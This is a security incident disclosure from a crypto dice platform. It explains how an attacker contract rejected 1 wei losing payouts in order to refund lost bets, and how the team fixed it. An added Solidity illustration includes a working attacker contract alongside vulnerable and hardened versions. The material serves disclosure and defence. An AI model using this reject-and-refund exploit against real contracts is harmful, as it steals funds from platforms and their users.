This is a note with a few technical details about the incident our Smart Contract experienced on the 26th of September, 2023.

We are posting all the details as part of our responsible disclosure practices: we have chosen to disclose any issue, security incident or other problem our platform faces, as we strongly believe in building trust through absolute transparency.

TL;DR

An unknown attacker exploited our Smart Contract by submitting bets from a contract that accepted the payout for winning bets and rejected the 1 wei payment for losing ones. This made dice9.win consider those losing bets unprocessed, allowing the attacker to refund them later and ultimately bank the profit in a risk-free way.

Wait… What? How?

The exploit employed by the attacker was actually pretty trivial: they crafted two smart contracts (one for Ethereum mainnet, another for Binance Smart Chain) that would place bets on dice9.win.

Whenever our Croupier bot settled a bet, this smart contract received the payment. One of the features of Smart Contracts on the EVM is the payable fallback (or receive) function: a special method that gets executed when funds are sent to the contract. The fallback function of the attacker's contract simply checked whether the payment was exactly 1 wei (meaning that the bet was lost) and reverted the execution if that was the case. Because that payment is made from inside our settlement transaction, the revert propagated and the whole settlement failed.

<aside> ❓ Why does a lost bet trigger a payment? Our Smart Contract is designed so that it always sends funds back to the player; if the bet is lost, the amount sent is 1 wei (a negligibly small amount that can be safely ignored), so that there is always a transaction on the blockchain for every kind of bet.

</aside>

Since we deliberately designed the Smart Contract so that the House cannot take any of the players' funds, one of the checks we implemented is the requirement that a bet is either fully processed or kept "aside", allowing the player to refund it if our system goes down and no bets get revealed. Accepting the payouts of winning bets while rejecting the payouts of lost bets therefore left every lost bet unprocessed and refundable after the waiting period. That is the whole exploit: the attacker kept the winnings and got the stakes of all losing bets back.

How did you find out?

Luckily for us, the stars aligned that day. First, our system monitoring noticed that a significant number of settle bet transactions had started failing for no apparent reason. Second, SEAL 911, a team of security researchers, contacted us via our support channels: they had noticed transactions to Tornado Cash with funds originating from our Smart Contract.

<aside> 🙏 Thank you, SEAL 911! We truly appreciate your efforts in making the ecosystem safer and more secure for everyone involved, and especially admire your disclosure practices: contacting our team so swiftly was a truly gentlemanly deed.

</aside>

Following our internal procedures, we promptly stopped all games and started the investigation. As it turned out, the issue was pretty straightforward, and we went straight to the resolution.

What was the fix?

The fix has been authored, reviewed, tested and deployed on the Ethereum mainnet and Binance Smart Chain in about 2 hours, and the website has been updated to utilize the fixed version of the Smart Contract.

The logic of the fix is very simple: we no longer allow bets to be placed from a Smart Contract. As an additional precautionary measure, we also allow the payment transfer to fail for lost bets: we simply ignore the error, and the bet is still marked as settled. If the bet is won, a failed transfer still reverts the transaction, just like it used to.
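To make the flaw and the fix concrete, here is an added illustration in Solidity. It is not dice9.win's code and does not reflect the real contract; it puts the three pieces described above side by side: a house contract whose settlement reverts when the player rejects the payout, the attacker's contract with a receive function that rejects exactly 1 wei, and a hardened house that blocks contract callers and tolerates a failed 1 wei transfer. The contract names, the 2x payout, the 1 hour refund window and the use of `msg.sender == tx.origin` as the "no contracts" check are all assumptions made for this example.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Illustrative contracts written for this note; they are not dice9.win's code.
// Assumed for brevity: a 2x payout on wins, a 1 hour refund delay, and a
// trusted "croupier" address that reveals outcomes.

contract VulnerableHouse {
    struct Bet { address player; uint256 amount; uint256 placedAt; bool settled; }

    mapping(uint256 => Bet) public bets;
    uint256 public nextBetId;
    address public immutable croupier;
    uint256 internal constant REFUND_DELAY = 1 hours;

    constructor() { croupier = msg.sender; }

    receive() external payable {} // bankroll deposits

    function placeBet() public payable virtual returns (uint256 id) {
        require(msg.value > 0, "no stake");
        id = nextBetId++;
        bets[id] = Bet(msg.sender, msg.value, block.timestamp, false);
    }

    // The croupier reveals the outcome. A lost bet still pays 1 wei so that every
    // bet leaves a payment on chain. transfer() reverts if the recipient rejects
    // the ether, and that revert also undoes `settled = true`: the bet is left
    // "unprocessed" and becomes refundable once REFUND_DELAY has passed.
    function settleBet(uint256 id, bool won) public virtual {
        require(msg.sender == croupier, "not croupier");
        Bet storage b = bets[id];
        require(b.player != address(0) && !b.settled, "not open");
        b.settled = true;
        uint256 payout = won ? b.amount * 2 : 1 wei;
        payable(b.player).transfer(payout);
    }

    // Safety valve so the house can never keep a stake it failed to settle.
    function refundBet(uint256 id) external {
        Bet storage b = bets[id];
        require(b.player != address(0) && !b.settled, "not open");
        require(block.timestamp >= b.placedAt + REFUND_DELAY, "too early");
        b.settled = true;
        payable(b.player).transfer(b.amount);
    }
}

// The attacker's side: accept winnings, reject the 1 wei "you lost" payment.
contract Attacker {
    VulnerableHouse public immutable house;
    address public immutable owner;

    constructor(VulnerableHouse h) { house = h; owner = msg.sender; }

    function bet() external payable returns (uint256) {
        return house.placeBet{value: msg.value}();
    }

    // Called once REFUND_DELAY has passed for a bet whose settlement reverted.
    function refund(uint256 id) external { house.refundBet(id); }

    function withdraw() external { payable(owner).transfer(address(this).balance); }

    // Runs inside the house's settleBet transaction. A 1 wei payment means the
    // bet was lost, so revert and make settleBet fail; winnings are kept.
    receive() external payable {
        require(msg.value != 1 wei, "reject losing payout");
    }
}

contract HardenedHouse is VulnerableHouse {
    event LosingPayoutRejected(uint256 indexed id, address player);

    // Assumed mechanism for "no bets from a contract": the caller must be the
    // transaction origin, so any contract in the call chain is rejected.
    function placeBet() public payable override returns (uint256 id) {
        require(msg.sender == tx.origin, "contracts cannot bet");
        id = super.placeBet();
    }

    function settleBet(uint256 id, bool won) public override {
        require(msg.sender == croupier, "not croupier");
        Bet storage b = bets[id];
        require(b.player != address(0) && !b.settled, "not open");
        b.settled = true; // state is final before any external call
        if (won) {
            payable(b.player).transfer(b.amount * 2); // still reverts on failure
        } else {
            // Ignore a rejected 1 wei transfer: the bet stays settled and can
            // no longer be refunded, so rejecting it gains the player nothing.
            (bool ok, ) = payable(b.player).call{value: 1 wei}("");
            if (!ok) emit LosingPayoutRejected(id, b.player);
        }
    }
}
```

Sequence in the vulnerable case: `Attacker.bet()` places the stake; the croupier calls `settleBet(id, false)`; the 1 wei transfer hits `Attacker`'s `receive`, which reverts, so the whole settlement reverts and `settled` stays `false`; after `REFUND_DELAY` the attacker calls `refund(id)` and gets the stake back, while winning bets were paid out normally. In `HardenedHouse` the same rejection only produces a `LosingPayoutRejected` event and the bet remains settled. Two caveats a practitioner should keep in mind: an `extcodesize` check is not a substitute for the origin check, because a contract's code size is zero while its constructor is running, and the `tx.origin` check also rejects smart-contract wallets, which is a deliberate trade-off here.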

But you lost funds?

We did lose some funds, but the silver lining is that it was a comparatively low price to pay: a much larger portion of the contract balance would have been compromised if the attacker had been sending bets faster, or if we had noticed the issue much later than we did. In the end, we lost only about 7% of our funds. That is painful, of course, but we have already had players winning bigger chunks in absolutely legitimate games anyway.

Is your platform safe then?

Absolutely. The design of the Smart Contract does not allow anyone (including us) to take players' funds out. The exploit was directed at us, not at other players.